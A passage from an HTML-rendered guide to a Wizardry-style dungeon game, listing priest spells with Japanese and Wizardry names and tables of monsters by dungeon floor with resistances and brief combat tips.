class=\"org-left\">zentomei</td>\n<td class=\"org-left\">masopic</td>\n<td class=\"org-left\">Reduce party's AC by 4. 全透明</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">jigokunohonou</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">Inferno to inflict 20-400 damage to a single enemy. 地獄の炎</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">kakubaku</td>\n<td class=\"org-left\">tiltowait</td>\n<td class=\"org-left\">Nuclear fusion to inflict 10-150 damage to all enemies. 核爆</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"org5e7606d\"></a>\n\n## Priest Spells\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-right\">lv</th>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">wiz (FYI)</th>\n<th scope=\"col\" class=\"org-left\">description</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">shukufuku</td>\n<td class=\"org-left\">kalki</td>\n<td class=\"org-left\">Reduce party's AC by 1. 祝福</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">jiai</td>\n<td class=\"org-left\">dios</td>\n<td class=\"org-left\">Restore 1-8 HP to a single target. 慈愛</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">ikari</td>\n<td class=\"org-left\">badios</td>\n<td class=\"org-left\">Angry power to inflict 1-8 damage to an enemy. 怒り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">akari</td>\n<td class=\"org-left\">milwa</td>\n<td class=\"org-left\">A bright light lets you see further for a while. 灯り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">mamori</td>\n<td class=\"org-left\">porfic</td>\n<td class=\"org-left\">Reduce the caster's AC by 4. 護り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">kabe</td>\n<td class=\"org-left\">matu</td>\n<td class=\"org-left\">Reduce party's AC by 2. 壁</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">kantei</td>\n<td class=\"org-left\">calfo</td>\n<td class=\"org-left\">Identify a trap with 95% accuracy. 鑑定</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">nero</td>\n<td class=\"org-left\">manifo</td>\n<td class=\"org-left\">Paralyze a group of enemies. 寝ろ</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">damare</td>\n<td class=\"org-left\">montino</td>\n<td class=\"org-left\">Silence an enemy group. 黙れ</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">hikarinotama</td>\n<td class=\"org-left\">lomilwa</td>\n<td class=\"org-left\">A bright light lets you see further for a long time. 光の玉</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">okiro</td>\n<td class=\"org-left\">dialko</td>\n<td class=\"org-left\">Cures a paralyzed or asleep for a single target. 起きろ</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">shikibetsu</td>\n<td class=\"org-left\">latumapic</td>\n<td class=\"org-left\">Identify enemies. 識別</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">kaminohogo</td>\n<td class=\"org-left\">bamatu</td>\n<td class=\"org-left\">Reduce party's AC by 4. 神の保護</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">iyashi</td>\n<td class=\"org-left\">dial</td>\n<td class=\"org-left\">Restore 4-16 HP to a single target. 癒し</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">gekido</td>\n<td class=\"org-left\">badial</td>\n<td class=\"org-left\">Infuriate power to inflict 2-16 damage to an enemy. 激怒</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">gedoku</td>\n<td class=\"org-left\">latumofis</td>\n<td class=\"org-left\">Cure poison to a single target. 解毒</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">hogo</td>\n<td class=\"org-left\">maporfic</td>\n<td class=\"org-left\">Reduce party's AC by 2 while you are in the dungeon. 保護</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">4</td>\n<td class=\"org-left\">zenjiai</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">Heal entire party by 1-8 HP. 全慈愛</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">daikaifuku</td>\n<td class=\"org-left\">dialma</td>\n<td class=\"org-left\">Restore 8-24 HP to a single target. 大回復</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">kaminoikari</td>\n<td class=\"org-left\">litokan</td>\n<td class=\"org-left\">God's fire inflicts 3-24 damage to an enemy group. 神の怒り</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">sosei</td>\n<td class=\"org-left\">di</td>\n<td class=\"org-left\">Attempt to ressurect a dead character. 蘇生</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">5</td>\n<td class=\"org-left\">shisubeshi</td>\n<td class=\"org-left\">badi</td>\n<td class=\"org-left\">Attempt to kill an enemy. 死すべし</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">tenchu</td>\n<td class=\"org-left\">lorto</td>\n<td class=\"org-left\">Gods power to inflict 6-36 damage to an enemy group. 天誅</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">kanzen</td>\n<td class=\"org-left\">madi</td>\n<td class=\"org-left\">Complete heal & cure. 完全</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">6</td>\n<td class=\"org-left\">hinshi</td>\n<td class=\"org-left\">mabadi</td>\n<td class=\"org-left\">Gods power to almost kill a single enemy. 瀕死</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">tenchihokai</td>\n<td class=\"org-left\">malikto</td>\n<td class=\"org-left\">A meteor strike inflicts 12-72 damage to all enemies. 天地崩壊</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">fukkatsu</td>\n<td class=\"org-left\">kadorto</td>\n<td class=\"org-left\">Attempt to resurrent an even ashed person. 復活</td>\n</tr>\n\n\n<tr>\n<td class=\"org-right\">7</td>\n<td class=\"org-left\">zenkai</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">8-24 HP group heal to party. 全快</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orgad97807\"></a>\n\n# Monsters\n\n\n<a id=\"org5a27944\"></a>\n\n## Shallow floors\n\nAs most monster data comes from Wizardry (though with different names), it's not easy to defeat them. Even orc skeletons could give your party devastating damages. At first, use 'shunmin' against monsters. If 'shunmin' is exhausted, you should go back to the castle and take some rest to recover MP.\n\ngoblin is your first target monsters. If you become level 2 or 3, you can target cops. Cops are the most powerful on the first floor but their e.p. is high.\n\nMonsters on the second floor are strong. You could even get poisoned or beheaded. Among them, coffee beans are bonus monsters. You can always run away from monsters that you don't want to fight against. Just don't forget to save often.\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-right\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">unidentified</th>\n<th scope=\"col\" class=\"org-right\">flr</th>\n<th scope=\"col\" class=\"org-left\">slp</th>\n<th scope=\"col\" class=\"org-left\">regist</th>\n<th scope=\"col\" class=\"org-left\">Comment</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">blue slime</td>\n<td class=\"org-left\">slime</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">The weakest monster in DL</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">orc</td>\n<td class=\"org-left\">small humanoid</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">fire</td>\n<td class=\"org-left\">Weak monster. Don't bother</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">goblin</td>\n<td class=\"org-left\">small humanoid</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p. Use 'shunmin'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">orc skeleton</td>\n<td class=\"org-left\">skeleton</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire,cold</td>\n<td class=\"org-left\">Low e.p. but a little strong</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ripper</td>\n<td class=\"org-left\">scruffy man</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Average</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">cop</td>\n<td class=\"org-left\">man in uniform</td>\n<td class=\"org-right\">1</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Most powerful. High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">yakuza</td>\n<td class=\"org-left\">scary man</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p. but can behead</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">zombie</td>\n<td class=\"org-left\">weird humanoid</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Could paralyze you</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">wild turkey</td>\n<td class=\"org-left\">bird</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">cold</td>\n<td class=\"org-left\">Scary looking big bird</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">pink cloud</td>\n<td class=\"org-left\">pink cloud</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Use mage spells and paralyze</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl1 mage</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Be careful of \"shunmin\"</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl1 priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Use priest lvl1 spells</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">coffee bean</td>\n<td class=\"org-left\">dot</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Bonus monster. High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl1 ninja</td>\n<td class=\"org-left\">black belt</td>\n<td class=\"org-right\">2</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">fire,cold</td>\n<td class=\"org-left\">Could behaed you</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">bobcat</td>\n<td class=\"org-left\">cat</td>\n<td class=\"org-right\">2,3</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">cold</td>\n<td class=\"org-left\">Could behead you</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">killer mouse</td>\n<td class=\"org-left\">giant rodent</td>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Could poison you</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">comodo dragon</td>\n<td class=\"org-left\">lizard</td>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire</td>\n<td class=\"org-left\">Could poison you. Good e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hyena</td>\n<td class=\"org-left\">mangy dog</td>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Not bad but a little strong</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl3 priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Be careful of \"damare\"</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl3 samurai</td>\n<td class=\"org-left\">kimonoed man</td>\n<td class=\"org-right\">3</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Be careful of \"shunmin\"</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl3 ninja</td>\n<td class=\"org-left\">kimonoed man</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p. Critical & poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">were bear</td>\n<td class=\"org-left\">bear</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">cold</td>\n<td class=\"org-left\">High e.p. Poison and paraly</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">humming dragon</td>\n<td class=\"org-left\">tiny dragon</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">fire</td>\n<td class=\"org-left\">Fire breath</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">rotting corpose</td>\n<td class=\"org-left\">weird humanoid</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Paralyze</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">akaoni</td>\n<td class=\"org-left\">ogre</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Average or weak</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">huge spider</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">wererbbit</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Weak</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">iron beetle</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Strong attack</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">green dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Breath and \"shunmin\"</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">priestess</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-right\">3,4</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Often with green dragon</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orgde7ee28\"></a>\n\n## Middle depth floors\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">unidentified</th>\n<th scope=\"col\" class=\"org-left\">flr</th>\n<th scope=\"col\" class=\"org-left\">slp</th>\n<th scope=\"col\" class=\"org-left\">regist</th>\n<th scope=\"col\" class=\"org-left\">Comment</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">swordsman</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Attack only</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">killer hornet</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">robot dog</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Robot dog could sleep</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">kokopelli</td>\n<td class=\"org-left\">kokopellis</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">spell</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ghost</td>\n<td class=\"org-left\">thin figure</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ice dragon</td>\n<td class=\"org-left\">dragon</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Breath</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">python</td>\n<td class=\"org-left\">snake</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">half prince</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Drain</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">bishop</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">honcho</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">4,5</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">magician</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl4 thief</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">snow lerpard</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">mononoke</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ancient spider</td>\n<td class=\"org-left\">insect</td>\n<td class=\"org-left\">5,6</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">werewolf</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">medusa hair</td>\n<td class=\"org-left\">snake</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Stone</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl5 priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl6 ninja</td>\n<td class=\"org-left\">man in black</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">No critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl7 mage</td>\n<td class=\"org-left\">man in robe</td>\n<td class=\"org-left\">5,6,7</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">'gouka', 'toketsu'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">kasipian wind</td>\n<td class=\"org-left\">sailor</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">yes</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">tycoon</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">high priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'shisubeshi'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">ronin</td>\n<td class=\"org-left\">man in kimono</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">arch mage</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">6,7,8</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'shunmin'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lupin the 3rd</td>\n<td class=\"org-left\">man in jacket</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">hell dog</td>\n<td class=\"org-left\">animal</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">aooni</td>\n<td class=\"org-left\">ogre</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'taika'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">troll</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">prince</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Drain level 2</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">moon walker</td>\n<td class=\"org-left\">unseen entity</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Drain</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">serpent</td>\n<td class=\"org-left\">snake</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">Poison</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 priest</td>\n<td class=\"org-left\">priest</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">'gekido', 'zenjiai'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl10 fighter</td>\n<td class=\"org-left\">man in armor</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">wizard</td>\n<td class=\"org-left\">man in robes</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">'zettaireido'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl7 thief</td>\n<td class=\"org-left\">man in leather</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 ninja</td>\n<td class=\"org-left\">monk</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">Critical</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">desert golem</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">&#xa0;</td>\n<td class=\"org-left\">High e.p.</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">petit demon</td>\n<td class=\"org-left\">demon</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">'taika'</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">kerberos</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">7,8,9</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire,sen</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n</tbody>\n</table>\n\n\n<a id=\"orgb8d9202\"></a>\n\n## Deep floors\n\n<table border=\"2\" cellspacing=\"0\" cellpadding=\"6\" rules=\"groups\" frame=\"hsides\">\n\n\n<colgroup>\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n\n<col class=\"org-left\" />\n</colgroup>\n<thead>\n<tr>\n<th scope=\"col\" class=\"org-left\">name</th>\n<th scope=\"col\" class=\"org-left\">unidentified</th>\n<th scope=\"col\" class=\"org-left\">flr</th>\n<th scope=\"col\" class=\"org-left\">slp</th>\n<th scope=\"col\" class=\"org-left\">regist</th>\n<th scope=\"col\" class=\"org-left\">Comment</th>\n</tr>\n</thead>\n\n<tbody>\n<tr>\n<td class=\"org-left\">stone giant</td>\n<td class=\"org-left\">giant</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">fire,sen</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">darkbull</td>\n<td class=\"org-left\">strange animal</td>\n<td class=\"org-left\">8,9,10</td>\n<td class=\"org-left\">-</td>\n<td class=\"org-left\">senmetsu</td>\n<td class=\"org-left\">&#xa0;</td>\n</tr>\n\n\n<tr>\n<td class=\"org-left\">lvl8 bishop</td>\n<td 